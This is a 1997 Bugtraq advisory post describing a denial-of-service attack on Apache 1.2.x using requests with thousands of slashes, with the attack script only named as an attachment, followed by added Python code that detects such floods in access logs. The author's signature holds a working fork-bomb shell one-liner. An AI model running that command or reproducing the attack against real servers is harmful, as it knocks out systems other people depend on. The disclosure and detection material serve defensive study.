X-RDate: Wed, 31 Dec 1997 09:57:30 +0500 (ESK)
Date: Tue, 30 Dec 1997 11:07:04 +0100
From: Michał Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Apache DoS attack?

[excuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on 1.2.4). When launched, it causes increases of the victim's load average and extreme slowdowns of disk operations. On my i586 Linux an annoying slowdown was experienced immediately (after maybe 5 seconds). After about 4 minutes work had been turned into real hell (286?).

The attached program ('beck') is a shell script. It works by sending excessive http requests with thousands of '/'s inside (parsed from file 'beck.dat'). A single request causes just a little longer thinking of Apache. But when requests are sent from a loop - huh, the victim system becomes slower and slower... At least on my machine; maybe when Apache is running on a lightspeed workstation this script makes no difference.

PS. A fast connection should help... All depends on the victim's system performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=

[Attachment: beck.zip (application/x-zip-compressed)]
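From the defender's side, the traffic described above is easy to pick out of the access log. The following Python is an added example, not part of the original post or of the 'beck' script: it parses Apache Common Log Format lines and flags requests whose path is dominated by '/' characters, then counts flagged requests per client. The thresholds and the sample log lines are constructed assumptions.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [time] "method path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)


def path_stats(path):
    """Return (total '/' characters, longest run of consecutive '/')."""
    slashes = path.count("/")
    longest = max((len(run) for run in re.findall(r"/+", path)), default=0)
    return slashes, longest


def flag_slash_floods(log_lines, max_slashes=100, max_run=16):
    """Return (host, path_len, slashes, longest_run) for each request whose
    path has an abnormal number of '/'s. Thresholds are assumptions; tune them
    to the site's real URI space (a normal path rarely has more than a dozen)."""
    hits = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if not m:  # skip lines that are not CLF (e.g. truncated or error log)
            continue
        slashes, longest = path_stats(m.group("path"))
        if slashes >= max_slashes or longest >= max_run:
            hits.append((m.group("host"), len(m.group("path")), slashes, longest))
    return hits


def hosts_over_threshold(hits, min_hits=3):
    """Count flagged requests per client; return clients at or above min_hits."""
    counts = Counter(host for host, *_ in hits)
    return {host: n for host, n in counts.items() if n >= min_hits}


# Constructed sample log lines (not real traffic): one ordinary request,
# followed by a burst of requests whose URI is 2000 '/' characters.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Dec/1997:11:07:04 +0100] "GET /index.html HTTP/1.0" 200 1043',
] + [
    '10.0.0.9 - - [30/Dec/1997:11:07:%02d +0100] "GET %s HTTP/1.0" 200 -'
    % (sec, "/" * 2000)
    for sec in range(5, 10)
]

if __name__ == "__main__":
    for host, n in hosts_over_threshold(flag_slash_floods(SAMPLE_LOG)).items():
        print("%s: %d slash-flood requests" % (host, n))
```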